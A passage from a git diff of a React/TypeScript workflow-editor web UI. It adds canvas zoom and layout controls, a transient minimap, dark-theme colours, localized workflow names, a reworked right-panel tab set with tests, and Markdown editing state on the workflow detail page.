+      <span className="pointer-events-none absolute right-full top-1/2 z-20 mr-2 -translate-y-1/2 whitespace-nowrap rounded-md bg-slate-900 px-2 py-1 text-[11px] font-medium text-white opacity-0 shadow-sm transition-opacity group-hover:opacity-100 group-focus-visible:opacity-100 dark:bg-zinc-800 dark:text-zinc-50">
+        {label}
+      </span>
+    </button>
+  );
+}
+
 export interface FlowCanvasProps {
   workflowJson: WorkflowJSON;
   /** 预留：true 时允许编辑连线，false 时只读连线（拖拽节点位置始终可用） */
@@ -627,8 +682,41 @@ export interface FlowCanvasProps {
 }
 
 function FlowCanvasInner({ workflowJson, editable = false, onNodeClick: externalOnNodeClick, layoutKey }: FlowCanvasProps) {
-  const { fitView } = useReactFlow();
+  const { t } = useTranslation('workflow');
+  const { theme } = useContext(ThemeContext);
+  const { fitView, zoomIn, zoomOut } = useReactFlow();
+  const isDark = theme === 'dark';
+  const edgeTheme = useMemo(() => (isDark ? DARK_EDGE_THEME : LIGHT_EDGE_THEME), [isDark]);
   const [selectedNodeId, setSelectedNodeId] = useState<string | null>(null);
+  const [controlsCollapsed, setControlsCollapsed] = useState(false);
+  const [showMiniMap, setShowMiniMap] = useState(false);
+  const miniMapTimerRef = useRef<number | null>(null);
+
+  const revealMiniMap = useCallback(() => {
+    setShowMiniMap(true);
+    if (miniMapTimerRef.current !== null) {
+      window.clearTimeout(miniMapTimerRef.current);
+    }
+    miniMapTimerRef.current = window.setTimeout(() => {
+      setShowMiniMap(false);
+      miniMapTimerRef.current = null;
+    }, 2200);
+  }, []);
+
+  const handleCanvasOperation = useCallback((event: React.PointerEvent<HTMLDivElement> | React.WheelEvent<HTMLDivElement>) => {
+    const target = event.target as HTMLElement | null;
+    if (target?.closest('.react-flow')) {
+      revealMiniMap();
+    }
+  }, [revealMiniMap]);
+
+  useEffect(() => {
+    return () => {
+      if (miniMapTimerRef.current !== null) {
+        window.clearTimeout(miniMapTimerRef.current);
+      }
+    };
+  }, []);
 
   const handleNodeClick = useCallback((nodeId: string) => {
     if (externalOnNodeClick) {
@@ -642,25 +730,55 @@ function FlowCanvasInner({ workflowJson, editable = false, onNodeClick: external
   const [nodes, setNodes, onNodesChange] = useNodesState<Node>([]);
   const [edges, setEdges] = useEdgesState<Edge>([]);
 
-  // Rebuild layout whenever workflowJson or layoutKey changes
-  useEffect(() => {
-    const { nodes: newNodes, edges: newEdges } = buildLayout(workflowJson, handleNodeClick);
+  const applyLayout = useCallback((options: { reveal?: boolean } = {}) => {
+    const { nodes: newNodes, edges: newEdges } = buildLayout(workflowJson, handleNodeClick, edgeTheme);
     setNodes(newNodes);
     setEdges(newEdges);
+    if (options.reveal) {
+      revealMiniMap();
+    }
     // Re-fit after layout (small delay lets ReactFlow measure node sizes first)
     setTimeout(() => fitView({ padding: 0.2 }), 60);
-  }, [workflowJson, handleNodeClick, setNodes, setEdges, layoutKey]);
+  }, [workflowJson, handleNodeClick, edgeTheme, setNodes, setEdges, fitView, revealMiniMap]);
+
+  const resetLayout = useCallback(() => {
+    applyLayout({ reveal: true });
+  }, [applyLayout]);
+
+  // Rebuild layout whenever workflowJson or layoutKey changes
+  useEffect(() => {
+    applyLayout();
+  }, [applyLayout, layoutKey]);
 
   const onInit = useCallback(() => {
     setTimeout(() => fitView({ padding: 0.2 }), 50);
   }, [fitView]);
 
+  const handleZoomIn = useCallback(() => {
+    revealMiniMap();
+    void zoomIn();
+  }, [revealMiniMap, zoomIn]);
+
+  const handleZoomOut = useCallback(() => {
+    revealMiniMap();
+    void zoomOut();
+  }, [revealMiniMap, zoomOut]);
+
+  const handleFitView = useCallback(() => {
+    revealMiniMap();
+    void fitView({ padding: 0.2 });
+  }, [fitView, revealMiniMap]);
+
   const selectedNode = selectedNodeId
     ? workflowJson.nodes.find((n) => n.id === selectedNodeId) ?? null
     : null;
 
   return (
-    <div className="relative w-full h-full">
+    <div
+      className="relative w-full h-full"
+      onPointerDownCapture={handleCanvasOperation}
+      onWheelCapture={handleCanvasOperation}
+    >
       <ReactFlow
         nodes={nodes}
         edges={edges}
@@ -677,24 +795,56 @@ function FlowCanvasInner({ workflowJson, editable = false, onNodeClick: external
         fitViewOptions={{ padding: 0.2 }}
         proOptions={{ hideAttribution: true }}
       >
-        <Background variant={BackgroundVariant.Dots} gap={20} size={1} color="#e2e8f0" />
-        <Controls showInteractive={false} className="!shadow-sm !border !border-gray-200 !rounded-xl" />
-        <MiniMap
-          nodeColor={(node) => {
-            const colors: Record<string, string> = {
-              python: '#60a5fa',
-              logic: '#34d399',
-              branch: '#fbbf24',
-              loop: '#c084fc',
-            };
-            const d = node.data as unknown as ViewNodeData | undefined;
-            return colors[d?.nodeType ?? ''] ?? '#94a3b8';
-          }}
-          className="!border !border-gray-200 !shadow-sm !rounded-xl"
-          maskColor="rgba(241, 245, 249, 0.7)"
-        />
+        <Background variant={BackgroundVariant.Dots} gap={20} size={1} color={isDark ? '#5a6573' : '#e2e8f0'} />
+        {showMiniMap && (
+          <MiniMap
+            nodeColor={(node) => {
+              const colors: Record<string, string> = {
+                python: '#60a5fa',
+                logic: '#34d399',
+                branch: '#fbbf24',
+                loop: '#c084fc',
+              };
+              const d = node.data as unknown as ViewNodeData | undefined;
+              return colors[d?.nodeType ?? ''] ?? '#94a3b8';
+            }}
+            className="!rounded-lg !border !border-slate-200 !bg-white/95 !shadow-none dark:!border-zinc-700 dark:!bg-zinc-900"
+            maskColor={isDark ? 'rgba(34, 39, 46, 0.72)' : 'rgba(241, 245, 249, 0.68)'}
+          />
+        )}
       </ReactFlow>
 
+      <div className="absolute right-4 top-4 z-20 flex w-9 flex-col items-stretch gap-1 overflow-visible">
+        {!controlsCollapsed && (
+          <div className="flex w-full flex-col divide-y divide-slate-100 overflow-visible rounded-lg border border-slate-200 bg-white/90 backdrop-blur dark:divide-zinc-800 dark:border-zinc-700 dark:bg-zinc-900/90">
+            <CanvasControlButton label={t('detail.flowControls.zoomIn')} onClick={handleZoomIn}>
+              <ZoomIn className="h-4 w-4" strokeWidth={1.8} />
+            </CanvasControlButton>
+            <CanvasControlButton label={t('detail.flowControls.zoomOut')} onClick={handleZoomOut}>
+              <ZoomOut className="h-4 w-4" strokeWidth={1.8} />
+            </CanvasControlButton>
+            <CanvasControlButton label={t('detail.flowControls.fitView')} onClick={handleFitView}>
+              <Scan className="h-4 w-4" strokeWidth={1.8} />
+            </CanvasControlButton>
+            <CanvasControlButton label={t('detail.resetLayout')} onClick={resetLayout}>
+              <RotateCcw className="h-4 w-4" strokeWidth={1.8} />
+            </CanvasControlButton>
+          </div>
+        )}
+        <button
+          type="button"
+          onClick={() => setControlsCollapsed((prev) => !prev)}
+          aria-label={t(controlsCollapsed ? 'detail.flowControls.expand' : 'detail.flowControls.collapse')}
+          className="flex h-8 w-full items-center justify-center rounded-lg border border-slate-200 bg-white/90 text-slate-500 backdrop-blur transition-colors hover:bg-slate-50 hover:text-slate-700 focus:outline-none focus:ring-2 focus:ring-red-100 dark:border-zinc-700 dark:bg-zinc-900/90 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50 dark:focus:ring-zinc-700"
+        >
+          {controlsCollapsed ? (
+            <ChevronDown className="h-4 w-4" strokeWidth={1.8} />
+          ) : (
+            <ChevronUp className="h-4 w-4" strokeWidth={1.8} />
+          )}
+        </button>
+      </div>
+
       {/* Node detail modal — only shown when no external onNodeClick handler */}
       {!externalOnNodeClick && (
         <NodeDetailModal
diff --git a/webui/src/pages/WorkflowDetail/NodeInfoPanel.tsx b/webui/src/pages/WorkflowDetail/NodeInfoPanel.tsx
index 07b1a6171..e040d3150 100644
--- a/webui/src/pages/WorkflowDetail/NodeInfoPanel.tsx
+++ b/webui/src/pages/WorkflowDetail/NodeInfoPanel.tsx
@@ -7,6 +7,7 @@ import { useTranslation } from 'react-i18next';
 import { X, AlertCircle, Save, Loader2, ChevronDown, ChevronRight, Play, RotateCcw, Maximize2 } from 'lucide-react';
 import { workflowAPI, Workflow, WorkflowEdge, WorkflowExecution, WorkflowNode, WorkflowNodeExecution } from '@/api/workflow';
 import CopyButton from '@/components/common/CopyButton';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 
 // ─────────────────────────────────────────────
 // Constants
@@ -168,11 +169,11 @@ function ExpandedCodeEditor({
   }, [lineNumbers.length]);
 
   return (
-    <div className="flex h-full min-h-0 min-w-0 overflow-hidden rounded-xl border border-[#30363d] bg-[#0d1117]">
+    <div className="flex h-full min-h-0 min-w-0 overflow-hidden rounded-xl border border-[#4a5563] bg-[#252c35]">
       <div
         aria-hidden="true"
         data-testid="expanded-code-line-numbers"
-        className="flex-shrink-0 overflow-hidden select-none border-r border-[#30363d] bg-[#0b0f14] px-3 py-3 text-right font-mono text-[12px] leading-relaxed text-[#6e7681]"
+        className="flex-shrink-0 overflow-hidden select-none border-r border-[#4a5563] bg-[#20262d] px-3 py-3 text-right font-mono text-[12px] leading-relaxed text-[#9aa7b4]"
       >
         <div ref={lineNumberTrackRef}>
           {lineNumbers.map((lineNumber) => (
@@ -189,7 +190,7 @@ function ExpandedCodeEditor({
         onScroll={syncLineNumberOffset}
         rows={24}
         wrap="off"
-        className="h-full min-h-0 min-w-0 w-full resize-none overflow-auto bg-[#0d1117] px-4 py-3 font-mono text-[12px] leading-relaxed text-[#e6edf3] focus:outline-none focus:ring-2 focus:ring-red-400"
+        className="h-full min-h-0 min-w-0 w-full resize-none overflow-auto bg-[#252c35] px-4 py-3 font-mono text-[12px] leading-relaxed text-[#d7dee8] focus:outline-none focus:ring-2 focus:ring-[#539bf5]"
         placeholder={placeholder}
         spellCheck={false}
       />
@@ -596,7 +597,7 @@ function NodeRunSection({
 }
 
 export default function NodeInfoPanel({ node, workflow, latestExecution, width = 260, onClose, onSaved }: NodeInfoPanelProps) {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
   const [form, setForm]       = useState<WorkflowNode>({ ...node });
   const [saving, setSaving]   = useState(false);
   const [savedOk, setSavedOk] = useState(false);
@@ -698,7 +699,7 @@ export default function NodeInfoPanel({ node, workflow, latestExecution, width =
                 onChange={(e) => set('code', e.target.value)}
                 rows={12}
                 className="w-full px-2.5 py-2.5 rounded-lg text-[11px] font-mono resize-y focus:outline-none focus:ring-2 focus:ring-red-400
-                           bg-[#0d1117] text-[#e6edf3] border border-[#30363d] leading-relaxed"
+                           bg-[#252c35] text-[#d7dee8] border border-[#4a5563] leading-relaxed"
                 placeholder={t('detail.nodeInfo.codePlaceholder')}
                 spellCheck={false}
               />
@@ -787,7 +788,11 @@ export default function NodeInfoPanel({ node, workflow, latestExecution, width =
               <div><FL required>{t('detail.nodeInfo.subworkflow')}</FL>
                 <select value={form.workflow_id ?? ''} onChange={(e) => set('workflow_id', e.target.value)} className={SL}>
                   <option value="">{t('detail.nodeInfo.selectWorkflow')}</option>
-                  {avail.map((wf) => <option key={wf.id} value={wf.id}>{wf.name}</option>)}
+                  {avail.map((wf) => (
+                    <option key={wf.id} value={wf.id}>
+                      {getWorkflowDisplayName(wf, i18n.language)}
+                    </option>
+                  ))}
                 </select>
               </div>
               <JsonField label={t('detail.nodeInfo.inputMapping')} value={form.inputs_mapping} onChange={(v) => set('inputs_mapping', v)} />
@@ -842,7 +847,7 @@ export default function NodeInfoPanel({ node, workflow, latestExecution, width =
                 {t('detail.nodeInfo.closeExpandedEditor')}
               </button>
             </div>
-            <div className="flex-1 min-h-0 min-w-0 bg-[#0d1117] p-4">
+            <div className="flex-1 min-h-0 min-w-0 bg-[#252c35] p-4">
               <ExpandedCodeEditor
                 value={form.code ?? ''}
                 onChange={(value) => set('code', value)}
diff --git a/webui/src/pages/WorkflowDetail/RightPanel.test.tsx b/webui/src/pages/WorkflowDetail/RightPanel.test.tsx
index 42e7f4d4e..717d83f53 100644
--- a/webui/src/pages/WorkflowDetail/RightPanel.test.tsx
+++ b/webui/src/pages/WorkflowDetail/RightPanel.test.tsx
@@ -1,4 +1,5 @@
 import { render, screen } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
 import { describe, expect, it, vi } from 'vitest';
 
 import RightPanel from './RightPanel';
@@ -10,9 +11,8 @@ vi.mock('react-i18next', () => ({
     t: (key: string) => {
       const translations: Record<string, string> = {
         'detail.rightPanel.tabOverview': '概览',
-        'detail.rightPanel.tabChat': 'AI 编辑',
-        'detail.rightPanel.tabRun': '运行',
-        'detail.rightPanel.tabIntegration': '集成',
+        'detail.rightPanel.tabChat': '工作台',
+        'detail.rightPanel.tabIntegration': '发布',
         'detail.rightPanel.deleteWorkflow': '删除工作流',
         'detail.rightPanel.deleting': '删除中...',
         'detail.rightPanel.deleteConfirmTitle': '删除工作流',
@@ -36,10 +36,6 @@ vi.mock('./tabs/ChatTab', () => ({
   default: () => <div>chat tab</div>,
 }));
 
-vi.mock('./tabs/RunTab', () => ({
-  default: () => <div>run tab</div>,
-}));
-
 vi.mock('./tabs/IntegrationTab', () => ({
   default: () => <div>integration tab</div>,
 }));
@@ -81,4 +77,56 @@ describe('RightPanel', () => {
 
     expect(screen.queryByRole('button', { name: '前往会话列表查看' })).not.toBeInTheDocument();
   });
+
+  it('不在右侧顶栏渲染测试、历史和运行分栏', () => {
+    render(
+      <RightPanel
+        workflow={makeWorkflow()}
+        open
+      />,
+    );
+
+    expect(screen.queryByRole('button', { name: '测试' })).not.toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: '历史' })).not.toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: '运行' })).not.toBeInTheDocument();
+  });
+
+  it('支持外部控制当前 Tab', async () => {
+    const user = userEvent.setup();
+    const onActiveTabChange = vi.fn();
+
+    render(
+      <RightPanel
+        workflow={makeWorkflow()}
+        open
+        activeTab="chat"
+        onActiveTabChange={onActiveTabChange}
+      />,
+    );
+
+    expect(screen.getByText('chat tab')).toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: '发布' }));
+
+    expect(onActiveTabChange).toHaveBeenCalledWith('integration');
+    expect(screen.getByText('chat tab')).toBeInTheDocument();
+  });
+
+  it('只在概览 Tab 显示删除工作流按钮', async () => {
+    const user = userEvent.setup();
+
+    render(
+      <RightPanel
+        workflow={makeWorkflow()}
+        open
+        onDelete={vi.fn()}
+      />,
+    );
+
+    expect(screen.getByRole('button', { name: '删除工作流' })).toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: '工作台' }));
+
+    expect(screen.queryByRole('button', { name: '删除工作流' })).not.toBeInTheDocument();
+  });
 });
diff --git a/webui/src/pages/WorkflowDetail/RightPanel.tsx b/webui/src/pages/WorkflowDetail/RightPanel.tsx
index be2b15157..49d1ab880 100644
--- a/webui/src/pages/WorkflowDetail/RightPanel.tsx
+++ b/webui/src/pages/WorkflowDetail/RightPanel.tsx
@@ -4,9 +4,11 @@ import { useTranslation } from 'react-i18next';
 import { Workflow, WorkflowExecution, WorkflowNode } from '@/api/workflow';
 import { useConfirm } from '@/components/common/ConfirmDialog';
 import OverviewTab from './tabs/OverviewTab';
-import ChatTab from './tabs/ChatTab';
-import RunTab from './tabs/RunTab';
+import ChatTab, { type WorkflowChatLaunchRequest } from './tabs/ChatTab';
 import IntegrationTab from './tabs/IntegrationTab';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
+
+export type { WorkflowChatLaunchRequest };
 
 // ─────────────────────────────────────────────
 // Error boundary helpers
@@ -60,18 +62,23 @@ class TabErrorBoundary extends Component<
 // RightPanel
 // ─────────────────────────────────────────────
 
-type TabId = 'chat' | 'overview' | 'run' | 'integration';
+export type RightPanelTabId = 'chat' | 'overview' | 'integration';
 
 interface RightPanelProps {
   workflow: Workflow;
   latestExecution?: WorkflowExecution | null;
   open: boolean;
   width?: number;
+  activeTab?: RightPanelTabId;
+  chatLaunchRequest?: WorkflowChatLaunchRequest | null;
+  onChatLaunchRequestHandled?: (id: number) => void;
+  onActiveTabChange?: (tab: RightPanelTabId) => void;
   onLatestExecutionChange?: (execution: WorkflowExecution | null) => void;
   onExecutionSettled?: () => void;
   onWorkflowUpdated?: (updated: Workflow) => void;
   onFirstMessageSent?: () => void;
   onSessionChange?: (sessionId: string | null) => void;
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void;
   /** Currently selected node — passed to ChatTab to show reference chip in input */
   selectedNode?: WorkflowNode | null;
   onDeselectNode?: () => void;
@@ -80,23 +87,37 @@ interface RightPanelProps {
 
 export default function RightPanel({
   workflow, latestExecution, open, width = 320,
+  activeTab,
+  chatLaunchRequest,
+  onChatLaunchRequestHandled,
+  onActiveTabChange,
   onLatestExecutionChange,
   onExecutionSettled,
   onWorkflowUpdated,
   onFirstMessageSent,
   onSessionChange,
+  onGuidePrompt,
   selectedNode, onDeselectNode,
   onDelete,
 }: RightPanelProps) {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
   const confirm = useConfirm();
-  const [activeTab, setActiveTab] = useState<TabId>('overview');
+  const workflowDisplayName = getWorkflowDisplayName(workflow, i18n?.language);
+  const [internalActiveTab, setInternalActiveTab] = useState<RightPanelTabId>('overview');
   const [deleting, setDeleting] = useState(false);
+  const currentActiveTab = activeTab ?? internalActiveTab;
+
+  const handleTabChange = (tab: RightPanelTabId) => {
+    if (activeTab === undefined) {
+      setInternalActiveTab(tab);
+    }
+    onActiveTabChange?.(tab);
+  };
 
   const handleDelete = async () => {
     const ok = await confirm({
       title: t('detail.rightPanel.deleteConfirmTitle'),
-      description: t('detail.rightPanel.deleteConfirmDesc', { name: workflow.name }),
+      description: t('detail.rightPanel.deleteConfirmDesc', { name: workflowDisplayName }),
       confirmText: t('detail.rightPanel.deleteConfirmText'),
       variant: 'danger',
     });
@@ -109,16 +130,15 @@ export default function RightPanel({
     }
   };
 
-  const TABS: { id: TabId; label: string }[] = [
+  const TABS: { id: RightPanelTabId; label: string }[] = [
     { id: 'overview',     label: t('detail.rightPanel.tabOverview') },
     { id: 'chat',         label: t('detail.rightPanel.tabChat') },
-    { id: 'run',          label: t('detail.rightPanel.tabRun') },
     { id: 'integration',  label: t('detail.rightPanel.tabIntegration') },
   ];
 
   return (
     <div
-      className="flex flex-col bg-white border-l border-gray-200 flex-shrink-0 overflow-hidden transition-[width] duration-300 ease-in-out"
+      className="relative z-10 flex min-w-0 flex-col bg-white border-l border-gray-200 flex-shrink-0 overflow-hidden transition-[width] duration-300 ease-in-out"
       style={{ width: open ? width : 0 }}
     >
       {/* Tab bar */}
@@ -126,13 +146,13 @@ export default function RightPanel({
         {TABS.map((tab) => (
           <button
             key={tab.id}
-            onClick={() => setActiveTab(tab.id)}
+            onClick={() => handleTabChange(tab.id)}
             className={`flex-1 py-3 text-xs font-medium transition-colors relative ${
-              activeTab === tab.id ? 'text-red-600' : 'text-gray-500 hover:text-gray-700'
+              currentActiveTab === tab.id ? 'text-red-600' : 'text-gray-500 hover:text-gray-700'
             }`}
           >
             {tab.label}
-            {activeTab === tab.id && (
+            {currentActiveTab === tab.id && (
               <span className="absolute bottom-0 left-0 right-0 h-0.5 bg-red-600 rounded-full" />
             )}
           </button>
@@ -141,21 +161,22 @@ export default function RightPanel({
 
       {/* Tab content */}
       <div className="flex-1 min-h-0 overflow-hidden flex flex-col">
-        {activeTab === 'chat' && (
+        {currentActiveTab === 'chat' && (
           <ChatTab
             workflow={workflow}
             onLatestExecutionChange={onLatestExecutionChange}
             onWorkflowUpdated={onWorkflowUpdated}
             onFirstMessageSent={onFirstMessageSent}
             onSessionChange={onSessionChange}
+            launchRequest={chatLaunchRequest}
+            onLaunchRequestHandled={onChatLaunchRequestHandled}
             selectedNode={selectedNode}
             onNodeRefDismiss={onDeselectNode}
           />
         )}
-        {activeTab === 'overview' && <OverviewTab workflow={workflow} />}
-        {activeTab === 'run' && (
+        {currentActiveTab === 'overview' && (
           <TabErrorBoundary>
-            <RunTab
+            <OverviewTab
               workflow={workflow}
               latestExecution={latestExecution ?? null}
               onLatestExecutionChange={onLatestExecutionChange}
@@ -163,15 +184,19 @@ export default function RightPanel({
             />
           </TabErrorBoundary>
         )}
-        {activeTab === 'integration' && (
+        {currentActiveTab === 'integration' && (
           <TabErrorBoundary>
-            <IntegrationTab workflow={workflow} onWorkflowUpdated={onWorkflowUpdated} />
+            <IntegrationTab
+              workflow={workflow}
+              onWorkflowUpdated={onWorkflowUpdated}
+              onGuidePrompt={onGuidePrompt}
+            />
           </TabErrorBoundary>
         )}
       </div>
 
-      {/* 底部删除按钮 */}
-      {onDelete && (
+      {/* 底部删除按钮：仅概览页展示，避免编辑/集成流程中出现破坏性操作入口 */}
+      {onDelete && currentActiveTab === 'overview' && (
         <div className="flex items-center justify-end gap-2 px-4 py-3 border-t border-gray-100 flex-shrink-0">
           <button
             onClick={handleDelete}
diff --git a/webui/src/pages/WorkflowDetail/TopBar.tsx b/webui/src/pages/WorkflowDetail/TopBar.tsx
index cf5395b18..d4064fa03 100644
--- a/webui/src/pages/WorkflowDetail/TopBar.tsx
+++ b/webui/src/pages/WorkflowDetail/TopBar.tsx
@@ -2,6 +2,7 @@ import { Link } from 'react-router-dom';
 import { ArrowLeft, PanelRight, PanelRightClose } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
 import { Workflow, WorkflowExecution } from '@/api/workflow';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 
 interface TopBarProps {
   workflow: Workflow;
@@ -11,7 +12,8 @@ interface TopBarProps {
 }
 
 export default function TopBar({ workflow, latestExecution, panelOpen, onTogglePanel }: TopBarProps) {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
+  const displayName = getWorkflowDisplayName(workflow, i18n?.language);
 
   const statusConfig = {
     draft:    { label: t('status.draft'),    className: 'bg-gray-100 text-gray-700' },
@@ -43,7 +45,7 @@ export default function TopBar({ workflow, latestExecution, panelOpen, onToggleP
       {/* Workflow name + status */}
       <div className="flex flex-col flex-1 min-w-0">
         <div className="flex items-center gap-2 min-w-0">
-          <h1 className="text-sm font-semibold text-gray-900 truncate">{workflow.name}</h1>
+          <h1 className="text-sm font-semibold text-gray-900 truncate">{displayName}</h1>
           <span className={`px-2 py-0.5 rounded-full text-xs font-medium flex-shrink-0 ${status.className}`}>
             {status.label}
           </span>
diff --git a/webui/src/pages/WorkflowDetail/index.tsx b/webui/src/pages/WorkflowDetail/index.tsx
index ec556a510..a3074d55f 100644
--- a/webui/src/pages/WorkflowDetail/index.tsx
+++ b/webui/src/pages/WorkflowDetail/index.tsx
@@ -1,33 +1,58 @@
-import { useState, useEffect, useRef, useCallback } from 'react';
+import { useState, useEffect, useRef, useCallback, useMemo } from 'react';
 import { useParams, useNavigate } from 'react-router-dom';
-import ReactMarkdown from 'react-markdown';
-import remarkGfm from 'remark-gfm';
 import { useTranslation } from 'react-i18next';
-import { X, GitBranch, FileText, Code2, Layout, Download, FileJson } from 'lucide-react';
+import { X, GitBranch, FileText, Code2, FileJson, Bot } from 'lucide-react';
 import { workflowAPI, Workflow, WorkflowExecution, WorkflowNode } from '@/api/workflow';
+import { sessionApi } from '@/api/session';
 import LoadingSpinner from '@/components/common/LoadingSpinner';
+import WorkflowDocumentPanel, { type WorkflowDocumentMode } from '@/components/common/WorkflowDocumentPanel';
+import WorkflowMarkdownDiffReview from '@/components/common/WorkflowMarkdownDiffReview';
 import TopBar from './TopBar';
 import FlowCanvas from './FlowCanvas';
-import RightPanel from './RightPanel';
+import RightPanel, { type RightPanelTabId, type WorkflowChatLaunchRequest } from './RightPanel';
 import { extractErrorMessage } from '@/utils/error';
 import NodeInfoPanel from './NodeInfoPanel';
+import { buildWorkflowMarkdown } from '@/utils/workflowMarkdown';
+import {
+  acceptTextDiffHunk,
+  buildLineDiff,
+  buildTextDiffHunks,
+  rejectTextDiffHunk,
+  type TextDiffHunk,
+} from '@/utils/textDiff';
+import { useConfirm } from '@/components/common/ConfirmDialog';
+import {
+  SIDE_PANEL_MIN_WIDTH,
+  getInitialSidePanelWidth,
+  getMaxSidePanelWidth,
+} from '@/components/common/sidePanelSizing';
 
 type CanvasTab = 'flow' | 'md' | 'json';
 
-const PANEL_MIN = 240;
-const PANEL_RATIO = 0.40; // 初始占可用宽度的 40%
+interface EditDocDiff {
+  before: string;
+  after: string;
+}
 
-function getInitialPanelWidth() {
-  // 可用宽度 = 视口宽度 - 侧边导航栏（lg 以上为 256px）
-  const sidebarWidth = window.innerWidth >= 1024 ? 256 : 0;
-  const available = window.innerWidth - sidebarWidth;
-  return Math.max(PANEL_MIN, Math.round(available * PANEL_RATIO));
+interface WorkflowChatSessionRef {
+  workflowId: string;
+  sessionId: string;
+}
+
+function hasWorkflowJsonDefinition(workflow: Workflow | null) {
+  if (!workflow) return false;
+  return Boolean(
+    workflow.workflowJson.start
+    || workflow.workflowJson.nodes.length > 0
+    || workflow.workflowJson.edges.length > 0
+  );
 }
 
 export default function WorkflowDetail() {
   const { t } = useTranslation('workflow');
   const { id } = useParams<{ id: string }>();
   const navigate = useNavigate();
+  const confirm = useConfirm();
 
   const CANVAS_TABS: { id: CanvasTab; label: string; icon: React.ReactNode }[] = [
     { id: 'flow', label: t('detail.canvasTabs.flow'), icon: <GitBranch className="w-3.5 h-3.5" /> },
@@ -39,14 +64,25 @@ export default function WorkflowDetail() {
   const [loading, setLoading] = useState(true);
   const [error, setError] = useState<string | null>(null);
   const [panelOpen, setPanelOpen] = useState(true);
-  const [panelWidth, setPanelWidth] = useState(getInitialPanelWidth);
+  const [panelWidth, setPanelWidth] = useState(getInitialSidePanelWidth);
   const [runToast, setRunToast] = useState<{ type: 'success' | 'error'; text: string } | null>(null);
   const [drawerNode, setDrawerNode] = useState<WorkflowNode | null>(null);
   const [latestExecution, setLatestExecution] = useState<WorkflowExecution | null>(null);
-  const [layoutKey, setLayoutKey] = useState(0);
   const [canvasTab, setCanvasTab] = useState<CanvasTab>('flow');
+  const [rightPanelTab, setRightPanelTab] = useState<RightPanelTabId>('overview');
   const [showMdHint, setShowMdHint] = useState(false);
+  const [editDocDraft, setEditDocDraft] = useState('');
+  const [editDocBase, setEditDocBase] = useState('');
+  const [editDocMode, setEditDocMode] = useState<WorkflowDocumentMode>('preview');
+  const [editDocDiff, setEditDocDiff] = useState<EditDocDiff | null>(null);
+  const [editDocSaving, setEditDocSaving] = useState(false);
+  const [editDocReviewing, setEditDocReviewing] = useState<string | null>(null);
+  const [chatLaunchRequest, setChatLaunchRequest] = useState<WorkflowChatLaunchRequest | null>(null);
+  const [workflowChatSession, setWorkflowChatSession] = useState<WorkflowChatSessionRef | null>(null);
   const hasAutoSwitchedRef = useRef(false);
+  const chatLaunchSeqRef = useRef(0);
+  const editDocWorkflowIdRef = useRef<string | null>(null);
+  const missingMarkdownAutoLaunchRef = useRef<string | null>(null);
   const dragging = useRef(false);
   const dragStartX = useRef(0);
   const dragStartWidth = useRef(0);
@@ -54,9 +90,7 @@ export default function WorkflowDetail() {
   // 视口尺寸变化时，若面板比例超出合理范围则自动修正
   useEffect(() => {
     const onResize = () => {
-      const sidebarWidth = window.innerWidth >= 1024 ? 256 : 0;
-      const maxAllowed = Math.round((window.innerWidth - sidebarWidth) * 0.7);
-      setPanelWidth((w) => Math.min(w, Math.max(PANEL_MIN, maxAllowed)));
+      setPanelWidth((w) => Math.min(w, getMaxSidePanelWidth()));
     };
     window.addEventListener('resize', onResize);
     return () => window.removeEventListener('resize', onResize);
@@ -68,13 +102,12 @@ export default function WorkflowDetail() {
     dragStartX.current = e.clientX;
     dragStartWidth.current = panelWidth;
 
-    const sidebarWidth = window.innerWidth >= 1024 ? 256 : 0;
-    const panelMax = Math.round((window.innerWidth - sidebarWidth) * 0.7);
+    const panelMax = getMaxSidePanelWidth();
 
     const onMove = (ev: MouseEvent) => {
       if (!dragging.current) return;
       const delta = dragStartX.current - ev.clientX;
-      setPanelWidth(Math.min(panelMax, Math.max(PANEL_MIN, dragStartWidth.current + delta)));
+      setPanelWidth(Math.min(panelMax, Math.max(SIDE_PANEL_MIN_WIDTH, dragStartWidth.current + delta)));
     };
     const onUp = () => {
       dragging.current = false;
@@ -119,6 +152,17 @@ export default function WorkflowDetail() {
     void loadWorkflow();
   }, [id, loadWorkflow]);
 
+  useEffect(() => {
+    const next = workflow?.markdownContent ?? workflow?.editMarkdownContent ?? '';
+    const workflowIdChanged = (workflow?.id ?? null) !== editDocWorkflowIdRef.current;
+    editDocWorkflowIdRef.current = workflow?.id ?? null;
+    setEditDocDraft(next);
+    setEditDocBase(next);
+    if (workflowIdChanged) {
+      setEditDocMode(next ? 'preview' : 'edit');
+    }
+  }, [workflow?.id, workflow?.markdownContent, workflow?.editMarkdownContent]);
+
   const refreshWorkflowStats = useCallback(() => {
     void loadWorkflow({ preserveExecution: true, silent: true });
   }, [loadWorkflow]);
@@ -128,9 +172,25 @@ export default function WorkflowDetail() {
     setTimeout(() => setRunToast(null), 3000);
   }, []);
 
-  // 自动布局：递增 layoutKey 触发 FlowCanvas 重新 BFS 布局
-  const handleAutoLayout = useCallback(() => {
-    setLayoutKey((k) => k + 1);
+  const openAiEditPanel = useCallback(() => {
+    setPanelOpen(true);
+    setCanvasTab('md');
+    setEditDocMode('edit');
+    setShowMdHint(false);
+    setRightPanelTab('chat');
+  }, []);
+
+  const handleFlocksHelp = useCallback(() => {
+    openAiEditPanel();
+  }, [openAiEditPanel]);
+
+  const handleRightPanelTabChange = useCallback((tab: RightPanelTabId) => {
+    setRightPanelTab(tab);
+    if (tab === 'chat') {
+      setCanvasTab('md');
+      setEditDocMode('edit');
+      setShowMdHint(false);
+    }
   }, []);
 
   // 删除工作流
@@ -161,17 +221,336 @@ export default function WorkflowDetail() {
     }
   }, [workflow, showToast]);
 
-  // 导出 MD 文件
-  const handleExportMd = useCallback(() => {
